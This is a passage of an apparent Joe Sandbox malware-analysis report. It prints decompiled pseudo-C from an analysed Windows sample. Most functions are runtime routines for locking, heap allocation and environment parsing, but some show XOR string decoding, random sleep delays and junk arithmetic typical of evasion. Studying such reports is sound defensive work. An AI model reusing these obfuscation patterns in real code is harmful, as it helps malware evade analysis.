                                                                    							 *(_t92 - 4) = 0;
                                                                    							E00428CCC();
                                                                    							goto L13;
                                                                    						}
                                                                    						_push(0xfa0);
                                                                    						_t16 =  &(_t90[3]); // 0x8c
                                                                    						if(E00427A37(_t101) != 0) {
                                                                    							_t18 =  &(_t90[2]);
                                                                    							 *_t18 = _t90[2] + 1;
                                                                    							__eflags =  *_t18;
                                                                    							goto L12;
                                                                    						}
                                                                    						_t48 = E004223C2(_t92 - 0x10, 0xffffffff);
                                                                    						goto L10;
                                                                    					}
                                                                    					__eflags =  *(_t92 - 0x1c) - 0xffffffff;
                                                                    					if( *(_t92 - 0x1c) != 0xffffffff) {
                                                                    						break;
                                                                    					}
                                                                    					_t87 = _t87 + 1;
                                                                    				}
                                                                    				_t44 = _t92 - 4;
                                                                    				 *_t44 =  *(_t92 - 4) | 0xffffffff;
                                                                    				__eflags =  *_t44;
                                                                    				E00428D66();
                                                                    				_t49 =  *(_t92 - 0x1c);
                                                                    				goto L26;
                                                                    			}















                                                                    0x00428bf3
                                                                    0x00428bf3
                                                                    0x00428bf3
                                                                    0x00428bf5
                                                                    0x00428bfa
                                                                    0x00428bff
                                                                    0x00428c03
                                                                    0x00428c05
                                                                    0x00428c0d
                                                                    0x00428c94
                                                                    0x00428c94
                                                                    0x00428d60
                                                                    0x00428d65
                                                                    0x00428d65
                                                                    0x00428c15
                                                                    0x00428c1b
                                                                    0x00428c1d
                                                                    0x00428c20
                                                                    0x00428c20
                                                                    0x00428c26
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428c2c
                                                                    0x00428c35
                                                                    0x00428d03
                                                                    0x00428d09
                                                                    0x00428d0c
                                                                    0x00428d0e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428d10
                                                                    0x00428d17
                                                                    0x00428d19
                                                                    0x00428d19
                                                                    0x00428d20
                                                                    0x00428d24
                                                                    0x00428d26
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428d28
                                                                    0x00428d2c
                                                                    0x00428d2f
                                                                    0x00428d33
                                                                    0x00428d37
                                                                    0x00428d3a
                                                                    0x00428d3a
                                                                    0x00428d3f
                                                                    0x00428d42
                                                                    0x00428d45
                                                                    0x00428d46
                                                                    0x00428d4c
                                                                    0x00428d4e
                                                                    0x00428d50
                                                                    0x00428d50
                                                                    0x00428d50
                                                                    0x00428d50
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428c3b
                                                                    0x00428c3b
                                                                    0x00428c3b
                                                                    0x00428c4c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428c56
                                                                    0x00428cbe
                                                                    0x00428cbe
                                                                    0x00000000
                                                                    0x00428cbe
                                                                    0x00428c5d
                                                                    0x00428ca7
                                                                    0x00428ca7
                                                                    0x00428ca7
                                                                    0x00428cab
                                                                    0x00428cb1
                                                                    0x00428cb5
                                                                    0x00428cd5
                                                                    0x00428ce1
                                                                    0x00428ce4
                                                                    0x00428cec
                                                                    0x00428cec
                                                                    0x00428cee
                                                                    0x00000000
                                                                    0x00428cee
                                                                    0x00428cb8
                                                                    0x00000000
                                                                    0x00428cb8
                                                                    0x00428c61
                                                                    0x00428c67
                                                                    0x00428c6e
                                                                    0x00428c71
                                                                    0x00428c9f
                                                                    0x00428c9f
                                                                    0x00428ca2
                                                                    0x00000000
                                                                    0x00428ca2
                                                                    0x00428c73
                                                                    0x00428c78
                                                                    0x00428c85
                                                                    0x00428c9c
                                                                    0x00428c9c
                                                                    0x00428c9c
                                                                    0x00000000
                                                                    0x00428c9c
                                                                    0x00428c8d
                                                                    0x00000000
                                                                    0x00428c93
                                                                    0x00428cf1
                                                                    0x00428cf5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428cf7
                                                                    0x00428cf7
                                                                    0x00428d54
                                                                    0x00428d54
                                                                    0x00428d54
                                                                    0x00428d58
                                                                    0x00428d5d
                                                                    0x00000000

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00428C15
                                                                      • Part of subcall function 004241FB: RtlEnterCriticalSection.NTDLL(?), ref: 00424223
                                                                    • __lock.LIBCMT ref: 00428C61
                                                                    • RtlEnterCriticalSection.NTDLL(0000008C), ref: 00428CAB
                                                                    • RtlLeaveCriticalSection.NTDLL(0000008C), ref: 00428CB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter__lock$Leave
                                                                    • String ID:
                                                                    • API String ID: 885841014-0
                                                                    • Opcode ID: c2d884b73131b42e2fae67f27f4ea8126526ddd9bbcab0186f84e780e89b90e6
                                                                    • Instruction ID: 38b0a141d8fc7cec0bb9b8a043e1b863c23aac017dab17fe744d6ac09379721b
                                                                    • Opcode Fuzzy Hash: c2d884b73131b42e2fae67f27f4ea8126526ddd9bbcab0186f84e780e89b90e6
                                                                    • Instruction Fuzzy Hash: 74414871A023268AC7109F76F84576E77A0AF11378F60821FE061A62D1CF7C95418B2C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 95%
                                                                    			E00426DA5() {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t5;
                                                                    				signed int _t6;
                                                                    				signed int _t11;
                                                                    				signed int _t12;
                                                                    				signed int _t13;
                                                                    				signed int _t24;
                                                                    				signed int _t25;
                                                                    				signed int _t26;
                                                                    				signed int _t27;
                                                                    				void* _t30;
                                                                    
                                                                    				if( *0x44c270 == 0) {
                                                                    					_t5 = E004279F1();
                                                                    				}
                                                                    				_t26 =  *0x4480e0; // 0x0
                                                                    				_t24 = 0;
                                                                    				if(_t26 != 0) {
                                                                    					while(1) {
                                                                    						_t6 =  *_t26;
                                                                    						__eflags = _t6;
                                                                    						if(_t6 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _t6 - 0x3d;
                                                                    						if(_t6 != 0x3d) {
                                                                    							_t24 = _t24 + 1;
                                                                    							__eflags = _t24;
                                                                    						}
                                                                    						_t26 = _t26 + E00422F20(_t26) + 1;
                                                                    					}
                                                                    					_t5 = E00422EEB(4 + _t24 * 4);
                                                                    					_t25 = _t5;
                                                                    					__eflags = _t25;
                                                                    					 *0x448288 = _t25;
                                                                    					if(_t25 != 0) {
                                                                    						_t27 =  *0x4480e0; // 0x0
                                                                    						while(1) {
                                                                    							__eflags =  *_t27;
                                                                    							if(__eflags == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t30 = E00422F20(_t27) + 1;
                                                                    							__eflags =  *_t27 - 0x3d;
                                                                    							if( *_t27 == 0x3d) {
                                                                    								L14:
                                                                    								_t27 = _t27 + _t30;
                                                                    								__eflags = _t27;
                                                                    								continue;
                                                                    							}
                                                                    							_t12 = E00422EEB(_t30);
                                                                    							__eflags = _t12;
                                                                    							 *_t25 = _t12;
                                                                    							if(__eflags == 0) {
                                                                    								_push( *0x448288);
                                                                    								_t13 = E0042275E(0, _t25, _t27, __eflags);
                                                                    								 *0x448288 = 0;
                                                                    								_t11 = _t13 | 0xffffffff;
                                                                    								L17:
                                                                    								return _t11;
                                                                    							}
                                                                    							E00423FB0(_t12, _t27);
                                                                    							_t25 = _t25 + 4;
                                                                    							__eflags = _t25;
                                                                    							goto L14;
                                                                    						}
                                                                    						_push( *0x4480e0);
                                                                    						E0042275E(0, _t25, _t27, __eflags);
                                                                    						 *0x4480e0 = 0;
                                                                    						 *_t25 = 0;
                                                                    						 *0x44c264 = 1;
                                                                    						_t11 = 0;
                                                                    						__eflags = 0;
                                                                    						goto L17;
                                                                    					}
                                                                    					goto L9;
                                                                    				} else {
                                                                    					L9:
                                                                    					return _t5 | 0xffffffff;
                                                                    				}
                                                                    			}

















                                                                    0x00426db0
                                                                    0x00426db2
                                                                    0x00426db2
                                                                    0x00426db7
                                                                    0x00426dbd
                                                                    0x00426dc1
                                                                    0x00426dd5
                                                                    0x00426dd5
                                                                    0x00426dd7
                                                                    0x00426dd9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426dc5
                                                                    0x00426dc7
                                                                    0x00426dc9
                                                                    0x00426dc9
                                                                    0x00426dc9
                                                                    0x00426dd1
                                                                    0x00426dd1
                                                                    0x00426de3
                                                                    0x00426de8
                                                                    0x00426dea
                                                                    0x00426ded
                                                                    0x00426df3
                                                                    0x00426dfa
                                                                    0x00426e2d
                                                                    0x00426e2d
                                                                    0x00426e2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00426e0b
                                                                    0x00426e0c
                                                                    0x00426e10
                                                                    0x00426e2b
                                                                    0x00426e2b
                                                                    0x00426e2b
                                                                    0x00000000
                                                                    0x00426e2b
                                                                    0x00426e13
                                                                    0x00426e18
                                                                    0x00426e1b
                                                                    0x00426e1d
                                                                    0x00426e56
                                                                    0x00426e5c
                                                                    0x00426e61
                                                                    0x00426e67
                                                                    0x00426e50
                                                                    0x00000000
                                                                    0x00426e51
                                                                    0x00426e21
                                                                    0x00426e28
                                                                    0x00426e28
                                                                    0x00000000
                                                                    0x00426e28
                                                                    0x00426e31
                                                                    0x00426e37
                                                                    0x00426e3c
                                                                    0x00426e42
                                                                    0x00426e44
                                                                    0x00426e4e
                                                                    0x00426e4e
                                                                    0x00000000
                                                                    0x00426e4e
                                                                    0x00000000
                                                                    0x00426dc3
                                                                    0x00426df5
                                                                    0x00000000
                                                                    0x00426df5

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$___initmbctable_strcat
                                                                    • String ID:
                                                                    • API String ID: 109824703-0
                                                                    • Opcode ID: adffa97de6450f723e0a71e7c59596210a7b78bbb9812a87b7d53bd0324d8313
                                                                    • Instruction ID: e58f1c9615bcdc0196b439833a7213b3df1fe95dd253b56df45ba14356893c68
                                                                    • Opcode Fuzzy Hash: adffa97de6450f723e0a71e7c59596210a7b78bbb9812a87b7d53bd0324d8313
                                                                    • Instruction Fuzzy Hash: 2A11367A7095395AD7216F20BC8066B7B96FB023A83AB027FE19143265DF7D0846974C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00424A51() {
                                                                    				signed int _t15;
                                                                    				void* _t17;
                                                                    				void* _t18;
                                                                    				intOrPtr* _t20;
                                                                    				void* _t24;
                                                                    				signed int _t26;
                                                                    				intOrPtr* _t30;
                                                                    
                                                                    				_t15 =  *0x44c27c;
                                                                    				_t26 =  *0x44c28c;
                                                                    				if(_t15 != _t26) {
                                                                    					L4:
                                                                    					_t30 =  *0x44c280 + (_t15 + _t15 * 4) * 4;
                                                                    					_t17 = RtlAllocateHeap( *0x44c294, 8, 0x41c4);
                                                                    					 *(_t30 + 0x10) = _t17;
                                                                    					if(_t17 != 0) {
                                                                    						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                                                                    						 *(_t30 + 0xc) = _t18;
                                                                    						if(_t18 != 0) {
                                                                    							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
                                                                    							 *_t30 = 0;
                                                                    							 *((intOrPtr*)(_t30 + 4)) = 0;
                                                                    							 *0x44c27c =  *0x44c27c + 1;
                                                                    							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
                                                                    							_t20 = _t30;
                                                                    						} else {
                                                                    							HeapFree( *0x44c294, 0,  *(_t30 + 0x10));
                                                                    							goto L5;
                                                                    						}
                                                                    					} else {
                                                                    						L5:
                                                                    						_t20 = 0;
                                                                    					}
                                                                    					return _t20;
                                                                    				} else {
                                                                    					_t24 = RtlReAllocateHeap( *0x44c294, 0,  *0x44c280, _t26 + 0x50 + _t26 * 4 << 2);
                                                                    					if(_t24 != 0) {
                                                                    						 *0x44c28c =  *0x44c28c + 0x10;
                                                                    						 *0x44c280 = _t24;
                                                                    						_t15 =  *0x44c27c;
                                                                    						goto L4;
                                                                    					} else {
                                                                    						return 0;
                                                                    					}
                                                                    				}
                                                                    			}










                                                                    0x00424a51
                                                                    0x00424a56
                                                                    0x00424a61
                                                                    0x00424a97
                                                                    0x00424aae
                                                                    0x00424ab1
                                                                    0x00424ab9
                                                                    0x00424abc
                                                                    0x00424acf
                                                                    0x00424ad7
                                                                    0x00424ada
                                                                    0x00424aee
                                                                    0x00424af2
                                                                    0x00424af4
                                                                    0x00424af7
                                                                    0x00424b00
                                                                    0x00424b03
                                                                    0x00424adc
                                                                    0x00424ae6
                                                                    0x00000000
                                                                    0x00424ae6
                                                                    0x00424abe
                                                                    0x00424abe
                                                                    0x00424abe
                                                                    0x00424abe
                                                                    0x00424b07
                                                                    0x00424a63
                                                                    0x00424a78
                                                                    0x00424a80
                                                                    0x00424a86
                                                                    0x00424a8d
                                                                    0x00424a92
                                                                    0x00000000
                                                                    0x00424a82
                                                                    0x00424a85
                                                                    0x00424a85
                                                                    0x00424a80

                                                                    APIs
                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,00000000,00425042), ref: 00424A78
                                                                    • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000), ref: 00424AB1
                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00424ACF
                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00424AE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Allocate$AllocFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 94566200-0
                                                                    • Opcode ID: 9124a1a32329d2b212b9bcbd1a9c6039f711298d83930f084aacada8ed70ff57
                                                                    • Instruction ID: fc462d41b16f0961c9630db00c3817e9c495f17fd3820ddc828ded977c181831
                                                                    • Opcode Fuzzy Hash: 9124a1a32329d2b212b9bcbd1a9c6039f711298d83930f084aacada8ed70ff57
                                                                    • Instruction Fuzzy Hash: 46112E34742611DFDBA1CFA9FC85A267BB6F786710754466AF161C65B0D3F09801CB18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			E00418330(void* __ecx) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				signed int _t30;
                                                                    				void* _t38;
                                                                    				void* _t41;
                                                                    
                                                                    				_t41 =  &_v8;
                                                                    				_t30 =  *0x447d20; // 0x0
                                                                    				_v8 = 0x16;
                                                                    				_v7 = 0x12;
                                                                    				_v6 = 0xe;
                                                                    				_v5 = 0x13;
                                                                    				_v4 = 0x4a;
                                                                    				_v3 = 0x4d;
                                                                    				_v2 = 0x47;
                                                                    				_t38 = 0;
                                                                    				do {
                                                                    					_t8 = _t30 - 0x5d; // -93
                                                                    					_t30 = _t30 + ((_t8 ^ 0x0000147c) + (_t8 ^ 0x0000147c) * 0x00000008) * 0x00000008 | 0x00005be7;
                                                                    					 *(_t41 + _t38 + 4) =  *(_t41 + _t38 + 4) ^ 0x00000047;
                                                                    					_t38 = _t38 + 1;
                                                                    				} while (_t38 < 7);
                                                                    				return (0 | E00419410( *0x43003c( &_v8), __ecx,  &_v12, _t26) != 0xffffffff) - 0x00000001 & 0x00000007;
                                                                    			}














                                                                    0x00418330
                                                                    0x00418336
                                                                    0x0041833c
                                                                    0x00418341
                                                                    0x00418346
                                                                    0x0041834b
                                                                    0x00418350
                                                                    0x00418355
                                                                    0x0041835a
                                                                    0x0041835f
                                                                    0x00418361
                                                                    0x00418361
                                                                    0x00418375
                                                                    0x0041837b
                                                                    0x0041837f
                                                                    0x00418380
                                                                    0x004183af

                                                                    APIs
                                                                    • lstrlen.KERNEL32(00000016), ref: 0041838A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: G$J$M
                                                                    • API String ID: 1659193697-2267652016
                                                                    • Opcode ID: 16de599d5ab267097a2452c0437a1a45ef2fba6adc7a2aabf33a276deb444dc1
                                                                    • Instruction ID: 93b4774753d4a88ee6338dc27bc8e92b1d669f058cd388f0806084fb55268ea8
                                                                    • Opcode Fuzzy Hash: 16de599d5ab267097a2452c0437a1a45ef2fba6adc7a2aabf33a276deb444dc1
                                                                    • Instruction Fuzzy Hash: 0901B57410C3C0AAD305D328D9556DEBFD09B96308F08C9ADE0C987292D7B98549D767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E00416ED0(signed int __edx, void* __eflags) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t144;
                                                                    				signed int _t153;
                                                                    				signed char _t154;
                                                                    				signed int _t155;
                                                                    				signed int _t156;
                                                                    				signed char _t159;
                                                                    				signed int _t163;
                                                                    				signed int _t166;
                                                                    				signed int _t168;
                                                                    				signed int _t173;
                                                                    				signed int _t175;
                                                                    				signed int _t177;
                                                                    				signed int _t179;
                                                                    				signed int _t181;
                                                                    				signed int _t182;
                                                                    				signed char _t189;
                                                                    				signed char _t195;
                                                                    				signed char _t201;
                                                                    				signed int _t213;
                                                                    				signed int _t214;
                                                                    				void* _t228;
                                                                    				intOrPtr _t237;
                                                                    				signed int _t238;
                                                                    				signed int _t246;
                                                                    				intOrPtr _t251;
                                                                    				signed char _t252;
                                                                    				signed int _t261;
                                                                    				void* _t266;
                                                                    				intOrPtr _t272;
                                                                    				signed int _t273;
                                                                    				signed int _t277;
                                                                    				signed int _t290;
                                                                    				signed int _t300;
                                                                    				signed int _t301;
                                                                    				signed int _t302;
                                                                    				signed int _t303;
                                                                    				signed int _t304;
                                                                    				signed int _t305;
                                                                    				signed int _t306;
                                                                    				signed int _t308;
                                                                    				signed int _t312;
                                                                    				intOrPtr* _t314;
                                                                    				intOrPtr _t319;
                                                                    				void* _t320;
                                                                    				void* _t321;
                                                                    
                                                                    				_t261 = __edx;
                                                                    				_push(0xffffffff);
                                                                    				_push(E0042FD8E);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t319;
                                                                    				_t320 = _t319 - 0x114;
                                                                    				 *((intOrPtr*)(_t320 + 0x3c)) = 0xf;
                                                                    				 *((intOrPtr*)(_t320 + 0x38)) = 0;
                                                                    				 *((char*)(_t320 + 0x28)) = 0;
                                                                    				 *((intOrPtr*)(_t320 + 0x12c)) = 0;
                                                                    				E00415920(_t320 + 0x40);
                                                                    				_t314 =  *((intOrPtr*)(_t320 + 0x134));
                                                                    				 *((char*)(_t320 + 0x134)) = 1;
                                                                    				E00418090(_t320 + 0xf8,  *((intOrPtr*)(_t314 + 8)),  *((intOrPtr*)(_t314 + 0x10)));
                                                                    				 *((char*)(_t320 + 0x12c)) = 2;
                                                                    				 *(_t320 + 0x14) = 0;
                                                                    				Sleep((E0040D1C0(_t261) % 0xa + 1) * 0x3e8);
                                                                    				_t213 =  *0x447d08; // 0x0
                                                                    				_t228 = 0x4c;
                                                                    				_t144 = _t213 | 0x00000021;
                                                                    				_t266 = 0x2e;
                                                                    				do {
                                                                    					_t228 = _t228 - _t144;
                                                                    					_t266 = _t266 - 1;
                                                                    				} while (_t266 != 0);
                                                                    				_t214 = _t213 + _t228 + 0x508;
                                                                    				 *(_t320 + 0x18) = _t214;
                                                                    				while(1) {
                                                                    					 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    					if(E0041A830( *_t314, 0xa) != 0) {
                                                                    						goto L7;
                                                                    					}
                                                                    					L4:
                                                                    					if(E004073B0( *((intOrPtr*)(_t314 + 4)), 2) != 0 || E004073B0( *((intOrPtr*)(_t314 + 4)), 3) != 0) {
                                                                    						E00415840(_t320 + 0x18,  *(_t320 + 0x13), 0x4c);
                                                                    						_t214 =  *(_t320 + 0x18);
                                                                    					} else {
                                                                    						 *((char*)(_t320 + 0x12c)) = 1;
                                                                    						E00418470(_t320 + 0xf0);
                                                                    						E00415980(_t320 + 0x40);
                                                                    						__eflags =  *((intOrPtr*)(_t320 + 0x3c)) - 0x10;
                                                                    						if( *((intOrPtr*)(_t320 + 0x3c)) >= 0x10) {
                                                                    							_push( *(_t320 + 0x18));
                                                                    							L00421F9D();
                                                                    							_t320 = _t320 + 4;
                                                                    						}
                                                                    						__eflags = 0;
                                                                    						 *[fs:0x0] =  *((intOrPtr*)(_t320 + 0x114));
                                                                    						return 0;
                                                                    					}
                                                                    					L7:
                                                                    					E00415890(_t320 + 0x1b, _t214, 0x10);
                                                                    					_push(3);
                                                                    					_push(2);
                                                                    					_push(_t320 + 0x2c);
                                                                    					if(E00408590(_t320 + 0x84) != 0) {
                                                                    						_t214 = _t214 + 0x29ef;
                                                                    						__eflags = _t214;
                                                                    						 *(_t320 + 0x18) = _t214;
                                                                    						L14:
                                                                    						_t153 = E00407AC0( *((intOrPtr*)(_t314 + 4)), _t320 + 0x7c, _t320 + 0x14);
                                                                    						__eflags = _t153;
                                                                    						if(_t153 != 0) {
                                                                    							_t154 =  *(_t320 + 0x14);
                                                                    							__eflags = _t154 & 0x00000001;
                                                                    							if((_t154 & 0x00000001) != 0) {
                                                                    								L36:
                                                                    								_t155 =  *0x447d08; // 0x0
                                                                    								__eflags = _t155 - 0x6d;
                                                                    								if(__eflags >= 0) {
                                                                    									_t156 = _t155 | 0x0000002b;
                                                                    									__eflags = _t156;
                                                                    								} else {
                                                                    									_t156 = _t155 * 0x2f;
                                                                    								}
                                                                    								 *0x447d08 = _t156;
                                                                    								_push(_t320 + 0x78);
                                                                    								E00415B90(_t320 + 0x44, __eflags);
                                                                    								_t159 =  *(_t320 + 0x18);
                                                                    								_t320 = _t320 + 4;
                                                                    								__eflags = _t159 & 0x00000004;
                                                                    								if((_t159 & 0x00000004) == 0) {
                                                                    									E00402720(_t320 + 0xd8, _t314 + 0x50, 0, 0xffffffff);
                                                                    									_t237 =  *((intOrPtr*)(_t314 + 0x2c));
                                                                    									_t272 =  *((intOrPtr*)(_t314 + 0x30));
                                                                    									_t163 =  *(_t320 + 0x14) | 0x00000004;
                                                                    									__eflags = _t163;
                                                                    									 *(_t320 + 0x14) = _t163;
                                                                    								} else {
                                                                    									_t237 =  *((intOrPtr*)(_t314 + 0x1c));
                                                                    									_t272 =  *((intOrPtr*)(_t314 + 0x20));
                                                                    								}
                                                                    								 *((intOrPtr*)(_t320 + 0xf0)) = _t237;
                                                                    								 *((intOrPtr*)(_t320 + 0xf4)) = _t272;
                                                                    								E00415890(_t320 + 0x1b, _t214, 0x31);
                                                                    								_t166 =  *(_t320 + 0x14) | 0x00000002;
                                                                    								__eflags = _t166;
                                                                    								L43:
                                                                    								_t290 =  *(_t320 + 0x13);
                                                                    								_t238 =  *0x447d08; // 0x0
                                                                    								 *(_t320 + 0x14) = _t166;
                                                                    								 *(_t320 + 0x20) = _t290;
                                                                    								_t168 = _t290 * _t214;
                                                                    								__eflags = _t168;
                                                                    								_t112 = _t238 + 0x5d; // 0x5d
                                                                    								_t300 = _t112;
                                                                    								_t273 = 0x47;
                                                                    								do {
                                                                    									_t238 = _t238 + (_t168 + _t238 | _t300 | _t214);
                                                                    									_t273 = _t273 - 1;
                                                                    									__eflags = _t273;
                                                                    								} while (_t273 != 0);
                                                                    								_t314 =  *((intOrPtr*)(_t320 + 0x134));
                                                                    								 *0x447d08 = _t238;
                                                                    								E00407B10( *((intOrPtr*)(_t314 + 4)), _t320 + 0x7c, _t320 + 0x14);
                                                                    								_t301 =  *0x447d08; // 0x0
                                                                    								E00415840(_t320 + 0x18, _t290, _t301);
                                                                    								_push(_t320 + 0x40);
                                                                    								_push( *((intOrPtr*)(_t314 + 0x88)));
                                                                    								_push(_t314 + 0x6c);
                                                                    								_t173 = E004188E0(_t320 + 0xfc, __eflags);
                                                                    								__eflags = _t173;
                                                                    								if(_t173 != 0) {
                                                                    									_t214 =  *(_t320 + 0x18) *  *(_t320 + 0x18);
                                                                    									 *(_t320 + 0x1c) = _t214;
                                                                    									L00414B90( *((intOrPtr*)(_t314 + 0xc)), 0);
                                                                    									 *0x447d08 =  *0x447d08 + 0x74f5;
                                                                    									while(1) {
                                                                    										 *(_t320 + 0x13) = ((_t214 -  *(_t320 + 0x13)) * 0x6f >> 0x20) + 0x3c + (_t214 -  *(_t320 + 0x13)) * 0x6f;
                                                                    										if(E0041A830( *_t314, 0xa) != 0) {
                                                                    											goto L7;
                                                                    										}
                                                                    										goto L4;
                                                                    									}
                                                                    								}
                                                                    								_t175 =  *0x447d08; // 0x0
                                                                    								_t177 = _t175 -  *(_t320 + 0x20) + 0x27;
                                                                    								__eflags = _t177;
                                                                    								_t312 = 0x6f;
                                                                    								do {
                                                                    									_t312 = _t312 - 1;
                                                                    									__eflags = _t312;
                                                                    									 *(_t320 + 0x13) =  *(_t320 + 0x13) + _t177 + 0x5d;
                                                                    								} while (_t312 != 0);
                                                                    								L00414B90( *((intOrPtr*)(_t314 + 0xc)), 1);
                                                                    								_t179 =  *0x447d08; // 0x0
                                                                    								_t214 =  *(_t320 + 0x18);
                                                                    								 *0x447d08 = _t179 + 0x74f5;
                                                                    								while(1) {
